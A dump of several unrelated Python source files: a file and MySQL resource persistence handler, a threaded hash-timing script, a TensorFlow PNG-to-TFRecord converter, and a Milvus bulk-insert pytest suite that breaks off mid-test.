FilePersistenceHandler._extractConfig(self, configurationsDictionary)
if ("sizethreshold" not in self.config): self.config["sizethreshold"] = 0
else: self.config["sizethreshold"] = int(self.config["sizethreshold"])
if ("amountthreshold" not in self.config): self.config["amountthreshold"] = 0
else: self.config["amountthreshold"] = int(self.config["amountthreshold"])
if (self.config["sizethreshold"] < 0): raise ValueError("Parameter 'sizethreshold' must be zero or greater.")
if (self.config["amountthreshold"] < 0): raise ValueError("Parameter 'amountthreshold' must be zero or greater.")
if (self.config["sizethreshold"] == 0) and (self.config["amountthreshold"] == 0):
raise ValueError("Parameters 'sizethreshold' and 'amountthreshold' cannot be zero at the same time.")
def _addHandler(self, fileName):
config = deepcopy(self.originalConfig)
config["filename"] = fileName
config["filetype"] = self.config["filetype"]
handler = FilePersistenceHandler(config)
if (self.config["uniqueresourceid"]):
duplicated = set(handler.IDsHash).intersection(self.IDsHash)
if (not duplicated): self.IDsHash.update(dict.fromkeys(handler.IDsHash, len(self.fileHandlersList)))
else:
details = ["%s ['%s']" % (resourceID, self.fileHandlersList[self.IDsHash[resourceID]].config["filename"]) for resourceID in duplicated]
raise KeyError("Duplicated ID(s) found in '%s': %s" % (fileName, ", ".join(details)))
self.fileHandlersList.append(handler)
def select(self):
for handlerKey, handler in enumerate(self.fileHandlersList):
(resourceKey, resourceID, resourceInfo) = handler.select()
if (resourceID): return ((handlerKey, resourceKey), resourceID, resourceInfo)
return (None, None, None)
def update(self, keyPair, status, resourceInfo):
self.fileHandlersList[keyPair[0]].update(keyPair[1], status, resourceInfo)
def insert(self, resourcesList):
for resourceID, resourceInfo in resourcesList:
if (self.config["uniqueresourceid"]) and (resourceID in self.IDsHash):
handler = self.fileHandlersList[self.IDsHash[resourceID]]
#try: handler.insert([(resourceID, resourceInfo)])
#except KeyError: raise KeyError("Cannot insert resource, ID %s already exists in file '%s'." % (resourceID, handler.config["filename"]))
handler.insert([(resourceID, resourceInfo)])
continue
with self.insertLock:
handler = self.fileHandlersList[self.insertHandlerIndex]
# Change insert handler if size or amount thresholds were exceeded. If there are no more
# handlers in the list, open a new file and instantiate a new handler to take care of it
while ((self.insertSize >= self.config["sizethreshold"]) or
(self.insertAmount >= self.config["amountthreshold"])):
self.insertHandlerIndex += 1
if (self.insertHandlerIndex >= len(self.fileHandlersList)):
newFileName = "%s.%d" % (self.config["filename"], self.nextSuffixNumber)
with open(newFileName, "w") as file: self.fileHandler.dump([], file, self.fileColumns)
self._addHandler(newFileName)
self.nextSuffixNumber += 1
handler = self.fileHandlersList[self.insertHandlerIndex]
if (self.config["sizethreshold"]): self.insertSize = os.path.getsize(handler.config["filename"])
if (self.config["amountthreshold"]): self.insertAmount = len(handler.resources)
handler.insert([(resourceID, resourceInfo)])
if (self.config["uniqueresourceid"]): self.IDsHash[resourceID] = self.insertHandlerIndex
if (self.config["sizethreshold"]):
self.insertSize += len(self.fileHandler.unparse(handler.resources[-1], self.fileColumns))
if (self.config["amountthreshold"]):
self.insertAmount += 1
def count(self):
counts = [0] * 6
for handler in self.fileHandlersList:
counts = [x + y for x, y in zip(counts, handler.count())]
return counts
def reset(self, status):
for handler in self.fileHandlersList: handler.reset(status)
def shutdown(self):
for handler in self.fileHandlersList: handler.shutdown()
class MySQLPersistenceHandler(BasePersistenceHandler):
"""Store and retrieve resources to/from a MySQL database.
The table must already exist in the database and must contain at least three columns: a primary key column, a resource ID column and a status column.
.. note::
This handler uses `MySQL Connector/Python <http://dev.mysql.com/doc/connector-python/en/index.html>`_ to interact with MySQL databases.
"""
def __init__(self, configurationsDictionary):
BasePersistenceHandler.__init__(self, configurationsDictionary)
self.echo = common.EchoHandler(self.config["echo"])
self.local = threading.local()
self.selectCacheThreadExceptionEvent = threading.Event()
self.selectNoResourcesEvent = threading.Event()
self.selectWaitCondition = threading.Condition()
# Get column names
query = "SELECT * FROM " + self.config["table"] + " LIMIT 0"
connection = mysql.connector.connect(**self.config["connargs"])
cursor = connection.cursor()
cursor.execute(query)
cursor.fetchall()
self.colNames = cursor.column_names
cursor.close()
connection.close()
self.excludedColNames = (self.config["primarykeycolumn"], self.config["resourceidcolumn"], self.config["statuscolumn"])
self.infoColNames = [name for name in self.colNames if (name not in self.excludedColNames)]
# Start select cache thread
self.resourcesQueue = Queue.Queue()
t = threading.Thread(target = self._selectCacheThread)
t.daemon = True
t.start()
with self.selectWaitCondition: self.selectWaitCondition.wait()
def _extractConfig(self, configurationsDictionary):
BasePersistenceHandler._extractConfig(self, configurationsDictionary)
if ("selectcachesize" not in self.config): raise KeyError("Parameter 'selectcachesize' must be specified.")
else: self.config["selectcachesize"] = int(self.config["selectcachesize"])
if ("onduplicateupdate" not in self.config): self.config["onduplicateupdate"] = False
else: self.config["onduplicateupdate"] = common.str2bool(self.config["onduplicateupdate"])
def _selectCacheQuery(self):
query = "SELECT " + self.config["primarykeycolumn"] + " FROM " + self.config["table"] + " WHERE " + self.config["statuscolumn"] + " = %s ORDER BY " + self.config["primarykeycolumn"]
if (self.config["selectcachesize"] > 0): query += " LIMIT %d" % self.config["selectcachesize"]
connection = mysql.connector.connect(**self.config["connargs"])
connection.autocommit = True
cursor = connection.cursor()
cursor.execute(query, (self.status.AVAILABLE,))
resourcesKeys = cursor.fetchall()
cursor.close()
connection.close()
return resourcesKeys
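# With table "resources", primary key column "resources_pk", status column "status" and
# selectcachesize 1000 (all illustrative), the query above renders roughly as:
#   SELECT resources_pk FROM resources WHERE status = %s ORDER BY resources_pk LIMIT 1000
# where %s is bound to self.status.AVAILABLE by the connector.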
def _selectCacheThread(self):
try:
previouslyEmpty = False
while True:
if not previouslyEmpty: self.echo.out("[Table: %s] Select cache empty. Querying database..." % self.config["table"])
resourcesKeys = self._selectCacheQuery()
if resourcesKeys:
if previouslyEmpty: self.echo.out("[Table: %s] New resources available now." % self.config["table"])
self.selectNoResourcesEvent.clear()
previouslyEmpty = False
self.echo.out("[Table: %s] Filling select cache with resources keys..." % self.config["table"])
for key in resourcesKeys: self.resourcesQueue.put(key[0])
self.echo.out("[Table: %s] Select cache filled." % self.config["table"])
with self.selectWaitCondition: self.selectWaitCondition.notify()
self.resourcesQueue.join()
else:
if not previouslyEmpty: self.echo.out("[Table: %s] No available resources found." % self.config["table"])
self.selectNoResourcesEvent.set()
previouslyEmpty = True
with self.selectWaitCondition:
self.selectWaitCondition.notify()
self.selectWaitCondition.wait()
except:
self.selectCacheThreadExceptionEvent.set()
self.echo.out("[Table: %s] Exception while trying to fill select cache." % self.config["table"], "EXCEPTION")
def setup(self):
self.local.connection = mysql.connector.connect(**self.config["connargs"])
self.local.connection.autocommit = True
def select(self):
# Try to get resource key from select cache
while True:
try:
resourceKey = self.resourcesQueue.get_nowait()
except Queue.Empty:
if self.selectCacheThreadExceptionEvent.is_set():
raise RuntimeError("Exception in select cache thread. Execution of MySQLPersistenceHandler aborted.")
elif self.selectNoResourcesEvent.is_set():
with self.selectWaitCondition: self.selectWaitCondition.notify()
return (None, None, None)
else: break
# Fetch resource information and mark it as being processed
cursor = self.local.connection.cursor(dictionary = True)
query = "UPDATE " + self.config["table"] + " SET " + self.config["statuscolumn"] + " = %s WHERE " + self.config["primarykeycolumn"] + " = %s"
cursor.execute(query, (self.status.INPROGRESS, resourceKey))
self.resourcesQueue.task_done()
query = "SELECT * FROM " + self.config["table"] + " WHERE " + self.config["primarykeycolumn"] + " = %s"
cursor.execute(query, (resourceKey,))
resource = cursor.fetchone()
cursor.close()
return (resource[self.config["primarykeycolumn"]],
resource[self.config["resourceidcolumn"]],
{k: resource[k] for k in self.infoColNames})
def update(self, resourceKey, status, resourceInfo):
cursor = self.local.connection.cursor()
if (not resourceInfo):
query = "UPDATE " + self.config["table"] + " SET " + self.config["statuscolumn"] + " = %s WHERE " + self.config["primarykeycolumn"] + " = %s"
cursor.execute(query, (status, resourceKey))
else:
info = {k: resourceInfo[k] for k in resourceInfo if (k not in self.excludedColNames)}
query = "UPDATE " + self.config["table"] + " SET " + self.config["statuscolumn"] + " = %s, " + " = %s, ".join(info.keys()) + " = %s WHERE " + self.config["primarykeycolumn"] + " = %s"
cursor.execute(query, (status,) + tuple(info.values()) + (resourceKey,))
cursor.close()
def insert(self, resourcesList):
# The method cursor.executemany() is optimized for multiple inserts, batching all data into a single INSERT INTO
# statement. It would be the best fit here, but unfortunately it does not parse the DEFAULT keyword
# correctly. The alternative is to pre-build the query and send it to cursor.execute() instead.
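# For example (illustrative), inserting two resources into a table with columns
# (resources_pk, resource_id, status, crawled_at), where only the ID and the crawled_at info
# are provided, would build:
#   INSERT INTO resources (resources_pk, resource_id, status, crawled_at)
#   VALUES (DEFAULT, %s, DEFAULT, %s), (DEFAULT, %s, DEFAULT, %s)
# with data = [id1, crawled1, id2, crawled2].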
if not resourcesList: return
query = "INSERT INTO " + self.config["table"] + " (" + ", ".join(self.colNames) + ") VALUES "
data = []
values = []
for resourceID, resourceInfo in resourcesList:
newResource = {self.config["resourceidcolumn"]: resourceID}
newResource.update(resourceInfo)
resourceValues = []
for column in self.colNames:
if (column in newResource):
resourceValues.append("%s")
data.append(newResource[column])
else: resourceValues.append("DEFAULT")
values.append("(" + ", ".join(resourceValues) + ")")
query += ", ".join(values)
if (self.config["onduplicateupdate"]):
query += " ON DUPLICATE KEY UPDATE " + ", ".join(["{0} = VALUES({0})".format(column) for column in self.infoColNames])
cursor = self.local.connection.cursor()
cursor.execute(query, data)
cursor.close()
self.selectNoResourcesEvent.clear()
with self.selectWaitCondition: self.selectWaitCondition.notify()
def count(self):
query = "SELECT " + self.config["statuscolumn"] + ", count(*) FROM " + self.config["table"] + " GROUP BY " + self.config["statuscolumn"]
cursor = self.local.connection.cursor()
cursor.execute(query)
result = cursor.fetchall()
cursor.close()
counts = [0, 0, 0, 0, 0, 0]
for row in result:
if (row[0] == self.status.SUCCEEDED): counts[1] = row[1]
elif (row[0] == self.status.INPROGRESS): counts[2] = row[1]
elif (row[0] == self.status.AVAILABLE): counts[3] = row[1]
elif (row[0] == self.status.FAILED): counts[4] = row[1]
elif (row[0] == self.status.ERROR): counts[5] = row[1]
counts[0] += row[1]
return tuple(counts)
def reset(self, status):
query = "UPDATE " + self.config["table"] + " SET " + self.config["statuscolumn"] + " = %s WHERE " + self.config["statuscolumn"] + " = %s"
cursor = self.local.connection.cursor()
cursor.execute(query, (self.status.AVAILABLE, status))
affectedRows = cursor.rowcount
cursor.close()
with self.selectWaitCondition: self.selectWaitCondition.notify()
return affectedRows
def finish(self):
self.local.connection.close()
|
main_threaded.py
|
import datetime
import multiprocessing
from threading import Thread
from model.hash_generator import HashGenerator
QUANTITY = 160
def main():
hash_gen = HashGenerator(difficulty=4)
processor_count = multiprocessing.cpu_count()
threads = []
print(f'\nProcessors count: {processor_count}\n')
t0 = datetime.datetime.now()
for _ in range(processor_count):
threads.append(Thread(target=hash_gen.get_hashes, args=(QUANTITY // processor_count,), daemon=True))  # integer share of the work per thread
[t.start() for t in threads]
[t.join() for t in threads]
dt = datetime.datetime.now() - t0
print(f'\nDone in {dt.total_seconds():.2f} seconds\n')
if __name__ == '__main__':
main()
|
build_image_data.py
|
"""Converts image data to TFRecords file format with Example protos.
Modified from
https://github.com/tensorflow/models/blob/master/inception/inception/data/build_image_data.py
The image data set is expected to reside in PNG files located in the
following directory structure.
data_dir/video_id/image0.png
data_dir/video_id/image1.png
...
data_dir/video_id/weird-image.png
data_dir/video_id/my-image.png
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where the number of shards per data set is controlled by the flags below. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image_raw: string containing PNG encoded image in RGB colorspace
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/notebooks/shared/videos/webcam/frames',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/notebooks/shared/videos/webcam/tfrecords',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 128,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
FLAGS = tf.app.flags.FLAGS
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(image_buffer):
"""Build an Example proto for an example.
Args:
image_buffer: string, PNG encoding of RGB image
Returns:
Example proto
"""
example = tf.train.Example(features=tf.train.Features(feature={
'image_raw': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
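# A hedged reader sketch (not part of the original pipeline) showing how the Example protos
# produced by _convert_to_example could be parsed back, assuming the same TF 1.x API used
# elsewhere in this file:
def _parse_example(serialized_example):
  """Parse a serialized Example back into a decoded RGB uint8 image tensor."""
  features = tf.parse_single_example(
      serialized_example,
      features={'image_raw': tf.FixedLenFeature([], tf.string)})
  # decode_png yields a tensor of shape [height, width, 3]
  return tf.image.decode_png(features['image_raw'], channels=3)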
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
self._decode_png = tf.image.decode_png(self._png_data, channels=3)
def decode_png(self, image_data):
image = self._sess.run(self._decode_png,
feed_dict={self._png_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.PNG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, PNG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Decode the RGB PNG.
image = coder.decode_png(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
assert height == 360
width = image.shape[1]
assert width == 640
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch index within [0, len(ranges)).
ranges: list of pairs of integers specifying the range of each batch to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(image_buffer)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
num_shards: integer number of shards for this data set.
"""
# Break all images into batches with ranges [ranges[i][0], ranges[i][1]).
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in PNG files located in
the following directory structure.
data_dir/video_id/image0.png
data_dir/video_id/image1.png
Returns:
filenames: list of strings; each string is a path to an image file.
"""
print('Determining list of input files and labels from %s.' % data_dir)
filenames = []
png_file_path = '{}/*/*.png'.format(data_dir)
matching_files = tf.gfile.Glob(png_file_path)
filenames.extend(matching_files)
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images in the saved TFRecord files.
# Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
print('Found %d PNG files inside %s.' % (len(filenames), data_dir))
sys.stdout.flush()
return filenames
def _process_dataset(name, directory, num_shards):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
"""
filenames = _find_image_files(directory)
_process_image_files(name, filenames, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
if tf.gfile.Exists(FLAGS.output_directory):
tf.gfile.DeleteRecursively(FLAGS.output_directory)
tf.gfile.MakeDirs(FLAGS.output_directory)
# Run it!
#_process_dataset('validation', FLAGS.validation_directory, FLAGS.validation_shards)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards)
if __name__ == '__main__':
tf.app.run()
|
test_bulk_insert.py
|
import logging
import time
import pdb
import copy
import threading
from multiprocessing import Pool, Process
import pytest
from milvus import DataType
from utils import *
from constants import *
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": 10, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
def test_add_vector_with_empty_vector(self, connect, collection):
'''
target: test add vectors with empty vectors list
method: set empty vectors list as add method params
expected: raises an Exception
'''
vector = []
with pytest.raises(Exception) as e:
status, ids = connect.bulk_insert(collection, vector)
def test_add_vector_with_None(self, connect, collection):
'''
target: test add vectors with None
method: set None as add method params
expected: raises an Exception
'''
vector = None
with pytest.raises(Exception) as e:
status, ids = connect.bulk_insert(collection, vector)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_collection_not_existed(self, connect):
'''
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: error raised
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.bulk_insert(collection_name, default_entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
'''
target: test delete collection after insert vector
method: insert vector and delete collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entity)
assert len(ids) == 1
connect.drop_collection(collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_sleep_drop_collection(self, connect, collection):
'''
target: test delete collection after insert vector for a while
method: insert vector, flush, and drop collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entity)
assert len(ids) == 1
connect.flush([collection])
connect.drop_collection(collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
'''
target: test build index after inserting vectors
method: insert vector and build index
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
info = connect.get_collection_info(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index_new(self, connect, collection, get_simple_index):
'''
target: test build index after inserting vectors
method: insert vector and build index
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities_new)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
info = connect.get_collection_info(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
'''
target: test insert vector after building index
method: build index and insert vector
expected: no error raised
'''
connect.create_index(collection, field_name, get_simple_index)
ids = connect.bulk_insert(collection, default_entities)
assert len(ids) == default_nb
info = connect.get_collection_info(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_search(self, connect, collection):
'''
target: test search vector after inserting vectors
method: insert vectors, flush, and search the collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities)
connect.flush([collection])
res = connect.search(collection, default_single_query)
logging.getLogger().debug(res)
assert res
def test_insert_segment_row_count(self, connect, collection):
nb = default_segment_row_limit + 1
res_ids = connect.bulk_insert(collection, gen_entities(nb))
connect.flush([collection])
assert len(res_ids) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids(self, connect, id_collection, insert_count):
'''
target: test insert vectors in collection, use customize ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids equals the insert count, and so does the collection row count
'''
nb = insert_count
ids = [i for i in range(nb)]
res_ids = connect.bulk_insert(id_collection, gen_entities(nb), ids)
connect.flush([id_collection])
assert len(res_ids) == nb
assert res_ids == ids
res_count = connect.count_entities(id_collection)
assert res_count == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
'''
target: test insert vectors in collection, use customize the same ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids equals the insert count, and so does the collection row count
'''
nb = insert_count
ids = [1 for i in range(nb)]
res_ids = connect.bulk_insert(id_collection, gen_entities(nb), ids)
connect.flush([id_collection])
assert len(res_ids) == nb
assert res_ids == ids
res_count = connect.count_entities(id_collection)
assert res_count == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, insert entities into it with ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
'''
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [filter_field, vector_field],
"segment_row_limit": default_segment_row_limit,
"auto_id": True
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = gen_entities_by_fields(fields["fields"], nb, default_dim)
res_ids = connect.bulk_insert(collection_name, entities, ids)
assert res_ids == ids
connect.flush([collection_name])
res_count = connect.count_entities(collection_name)
assert res_count == nb
# TODO: assert exception && enable
@pytest.mark.level(2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: error raised
'''
ids = [i for i in range(default_nb)]
res_ids = connect.bulk_insert(id_collection, default_entities, ids)
with pytest.raises(Exception) as e:
res_ids_new = connect.bulk_insert(id_collection, default_entities)
# TODO: assert exception && enable
@pytest.mark.level(2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_twice_not_ids_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use no ids first, and then use customized ids
expected: error raised
'''
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(id_collection, default_entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
'''
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(id_collection, default_entities, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, collection):
'''
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(collection, default_entity, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_no_ids_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, insert entities into it without ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
'''
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [filter_field, vector_field],
"segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], nb, default_dim)
res_ids = connect.bulk_insert(collection_name, entities)
connect.flush([collection_name])
res_count = connect.count_entities(collection_name)
assert res_count == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_tag param
expected: the collection row count equals nb
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
assert len(ids) == default_nb
assert connect.has_partition(collection, default_tag)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_with_ids(self, connect, id_collection):
'''
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_tag param
expected: the collection row count equals nb
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
res_ids = connect.bulk_insert(id_collection, default_entities, ids, partition_tag=default_tag)
assert res_ids == ids
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_default_tag(self, connect, collection):
'''
target: test insert entities into default partition
method: create partition and insert into collection without the tag param
expected: the collection row count equals to nb
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities)
connect.flush([collection])
assert len(ids) == default_nb
res_count = connect.count_entities(collection)
assert res_count == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_not_existed(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_tag param
expected: error raised
'''
tag = gen_unique_str()
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(collection, default_entities, partition_tag=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_existed(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it repeatedly, with the partition_tag param
expected: the collection row count equals 2 * nb
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
connect.flush([collection])
res_count = connect.count_entities(collection)
assert res_count == 2 * default_nb
@pytest.mark.level(2)
def test_insert_without_connect(self, dis_connect, collection):
'''
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
ids = dis_connect.bulk_insert(collection, default_entities)
def test_insert_entities_collection_not_existed(self, connect):
'''
target: test insert entities in a collection which did not exist before
method: insert entities into a non-existent collection, check the status
expected: error raised
'''
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(gen_unique_str("not_exist_collection"), default_entities)
def test_insert_dim_not_matched(self, connect, collection):
'''
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
'''
vectors = gen_vectors(default_nb, int(default_dim) // 2)
